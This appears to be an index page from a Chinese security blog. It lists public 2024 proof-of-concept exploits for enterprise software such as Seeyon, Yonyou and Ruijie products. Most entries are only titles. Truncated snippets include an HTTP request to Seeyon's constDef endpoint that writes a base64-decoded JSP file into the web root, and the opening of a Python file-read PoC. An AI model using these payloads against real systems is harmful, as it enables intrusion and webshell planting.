2024你懂的 第6页
2024攻防互联网公开POC
用友 NC Cloud jsinvoke 任意文件上传_秃兔安全
致远互联-M1移动协同办公管理软件-RCE_秃兔安全
喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞_秃兔安全
致远在野constDef接囗存在代码执行漏洞_秃兔安全

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...
秃兔的头像_秃兔安全至尊玉兔秃兔8个月前
08213
天清汉马vpn任意文件读取_秃兔安全
金和OA_CarCardInfo.aspx_SQL注入漏洞_秃兔安全
锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞_秃兔安全
科荣 AIO 管理系统任意文件读取_秃兔安全

科荣 AIO 管理系统任意文件读取

import base64import requests def poc(ip, file_path): # 构造URL地址url = f’http://{ip}/UtilServlet’headers = { 登录可见余下内容
秃兔的头像_秃兔安全至尊玉兔秃兔8个月前
0848
宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞_秃兔安全
JeecgBoot反射型XSS漏洞_秃兔安全